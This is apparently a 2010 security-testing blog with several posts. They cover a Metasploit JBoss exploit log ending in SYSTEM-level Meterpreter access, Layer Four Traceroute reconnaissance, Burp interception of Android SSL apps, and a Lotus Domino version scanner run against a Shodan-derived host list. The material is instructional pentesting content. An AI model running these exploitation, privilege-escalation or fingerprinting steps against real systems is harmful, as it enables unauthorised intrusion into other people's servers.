msf exploit(jboss_deploymentfilerepository) > [*] Meterpreter session 4 opened ( -> at Sun May 09 11:21:32 -0400 2010

msf exploit(jboss_deploymentfilerepository) > sessions -l

Active sessions

Id Type Information Connection
-- ---- ----------- ----------
3 shell ->
4 meterpreter win2k3lab\Administrator @ win2k3lab ->

msf exploit(jboss_deploymentfilerepository) > sessions -i 4
[*] Starting interaction with 4...

meterpreter > getuid
Server username: win2k3lab\Administrator
meterpreter > use priv
Loading extension priv...success.
meterpreter > getsystem system (via technique 1).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > pwd
C:\Documents and Settings\Administrator\Desktop\jboss-6.0.0.M1\jboss-6.0.0.M1\bin
meterpreter >

Thursday, May 6, 2010

Layer Four Traceroute

Layer Four Traceroute (lft)

If you are using the one bundled with your distro you are probably missing out some of the more interesting and new features.

From the site:

"LFT, short for Layer Four Traceroute, is a sort of 'traceroute' that often works much faster (than the commonly-used Van Jacobson method) and goes through many configurations of packet-filters (firewalls). More importantly, LFT implements numerous other features including AS number lookups through several reliable sources, loose source routing, netblock name lookups, et al. What makes LFT unique? LFT is the all-in-one traceroute tool because it can launch a variety of different probes using ICMP, UDP, and TCP protocols, or the RFC1393 trace method."

Its been useful for me to locate more systems between me and the target host as well as identifying gateways/web firewalls that organization's send all (or some)web traffic through.

It also handy that you can throw it some switches to show the AS and network routes with the scan as well.

Old Traceroute:

cg@meh:~/evil/lft-3.1$ traceroute
traceroute to (, 30 hops max, 60 byte packets
1 ( 4.681 ms 5.794 ms 14.193 ms
2-8 Local Stuff

9 ( 35.743 ms 36.391 ms 37.102 ms

10 ( 173.747 ms 174.136 ms 175.054 ms

11 ( 32.762 ms 33.703 ms 37.096 ms

12 ( 17.652 ms 28.151 ms 24.033 ms

13 ( 24.864 ms 25.951 ms 26.485 ms

14 ( 109.384 ms 109.615 ms 110.180 ms

15 ( 106.607 ms 107.401 ms 110.382 ms

16 ( 112.458 ms 118.682 ms 106.207 ms

17 ( 107.323 ms 107.552 ms 107.789 ms
18 * * *

19 * * *

20 * * *

21 * * *

22 * * *
23 * * *
24 * * *
25 * * *
26 * * *

27 * * *

28 * * *

29 * * *
30 * * *

Layer Four Traceroute

cg@meh:~/evil/lft-3.1$ sudo lft -rNS -d 80
TTL LFT trace to

1 [33657] [CMCS] 2.3/1.5ms
** [neglected] no reply packets received from TTLs
2 through
-8 local stuff
9 [7922] [COMCAST-7922] ( 27.2/26.6ms

10 [8075] [MICROSOFT-CORP---MSN-AS-BLOCK] ( 25.9/24.3ms
11 [8075] [MICROSOFT-CORP---MSN-AS-BLOCK] 15.8/24.3ms

12 [8075] [MICROSOFT-CORP---MSN-AS-BLOCK] ( 34.1/14.8ms

13 [8075] [MICROSOFT-CORP---MSN-AS-BLOCK] ( 16.0/15.9ms

14 [8075] [MICROSOFT-CORP---MSN-AS-BLOCK] ( 121.3/98.2ms

15 [8075] [MICROSOFT-CORP---MSN-AS-BLOCK] ( 114.1/97.3ms
16 [6067] [ONYX] 101.6/99.9ms
17 [8075] [MICROSOFT-CORP---MSN-AS-BLOCK] 99.5/109.5ms

18 [AS?] [Net?] [target open] 98.5/109.4ms

Wednesday, May 5, 2010

Android SSL Apps & Burp

As a follow up to the post  regarding intercepting Android applications on the emulator using Burp, I wanted to give a solution for intercepting applications on the Android that enforce SSL/TLS correctly.

I ran into this problem with an app that enforced SSL/TLS. The app refused to communicate with Burp because of the certificate mismatch error. Unlike a browser you don't have the option to make an exception. Hence the app died and at the time I couldn't perform testing.

This video provides a solution I cooked up by reading some manuals and searching the web. Enjoy.

Android SSL Enforced Apps & Burp from cktricky on Vimeo.

~Happy Hacking!

Metasploit Lotus Domino Version Scanner

I pushed out the first of a few Lotus Domino modules I've been working on to the metasploit trunk last nite.

The first one is a Lotus Domino Version Module.

There is no real "banner grabbing" for versions with Lotus Domino, old old versions "may" display the version in the server headers but I've never seen anything above 5.x do this. You usually get something like:

HTTP/1.0 200 OK
Server: Lotus-Domino
Date: Fri, 30 Apr 2010 00:19:11 GMT
Last-Modified: Wed, 07 Apr 2010 01:39:54 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 5390
Cache-control: private

for headers.

Useful enough to identify that its a Domino web server but not so much for using the couple of remote exploits out there that are very version and/or fixpack dependent.

There are a couple of files that the web server may serve up that have version information.

The first being iNotes/FormsX.nsf that usually has the version information as a comment in the html (this can be turned off) and the second being download/filesets/l_LOTUS_SCRIPT.inf
type files that has the base install version (at least as far as I can tell its the base install). *If thats not right please let me know*

So let's give it a test drive...

msf > use auxiliary/scanner/lotus/lotus_domino_version
msf auxiliary(lotus_domino_version) > info

Name: Lotus Domino Version
Version: $Revision$
License: Metasploit Framework License (BSD)
Rank: Normal

Provided by:

Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
PATH / yes path
Proxies no Use a proxy chain
RHOSTS yes The target address range or CIDR identifier
RPORT 80 yes The target port
THREADS 1 yes The number of concurrent threads
VHOST no HTTP server virtual host

Checks to determine Lotus Domino Server Version.

msf auxiliary(lotus_domino_version) > set RHOSTS file:/home/user/shodan-domino.txt
RHOSTS => file:/home/user/shodan-domino.txt
msf auxiliary(lotus_domino_version) > run

[*] Lotus Domino Current Version: 6.5.4 (Windows NT/Intel)
[*] Lotus Domino Base Install Version:
[*] Lotus Domino Base Install Version:
[*] Lotus Domino Base Install Version:
[*] Lotus Domino Base Install Version:
[*] Lotus Domino Current Version: 6.5.5 (Solaris Sparc)
[*] Lotus Domino Base Install Version: 6.0.4
[*] Lotus Domino Base Install Version: 6.0.4
[-] no response for download/filesets/l_SEARCH.inf
[*] Lotus Domino Base Install Version: 6.0.4
[*] Scanned 02 of 20 hosts (010% complete)
[*] Lotus Domino Current Version: 8.0.2 HF1190 (Windows NT/Intel)
[*] Lotus Domino Current Version: 8.0.2 HF1190 (Windows NT/Intel)
[*] Lotus Domino Base Install Version:
[*] Lotus Domino Base Install Version:
[*] Lotus Domino Base Install Version:
[*] Lotus Domino Base Install Version:
[-] 302 Redirect to
[-] 302 Redirect to
[-] 302 Redirect to
[-] 302 Redirect to
[-] 302 Redirect to
[-] 302 Redirect to
[-] 302 Redirect to
[*] Scanned 04 of 20 hosts (020% complete)
[*] Lotus Domino Current Version: 7.0.1 (Windows NT/Intel)
[*] Lotus Domino Current Version: 7.0.1 (Windows NT/Intel)
[*] Lotus Domino Base Install Version:
[*] Lotus Domino Base Install Version:
[*] Lotus Domino Base Install Version:
[*] Lotus Domino Base Install Version:
[*] Scanned 06 of 20 hosts (030% complete)
[*] Lotus Domino Current Version: 7.0.2 (Windows NT/Intel)
[*] Lotus Domino Current Version: 7.0.2 (Windows NT/Intel)
[*] Lotus Domino Base Install Version:
[*] Lotus Domino Base Install Version:
[*] Lotus Domino Base Install Version:
[*] Lotus Domino Base Install Version:
[*] Lotus Domino Current Version: 7.0.3FP1 (Windows NT/Intel)
[*] Lotus Domino Current Version: 7.0.3FP1 (Windows NT/Intel)
[*] Lotus Domino Base Install Version:
[*] Lotus Domino Base Install Version:
[*] Lotus Domino Base Install Version:
[*] Lotus Domino Base Install Version: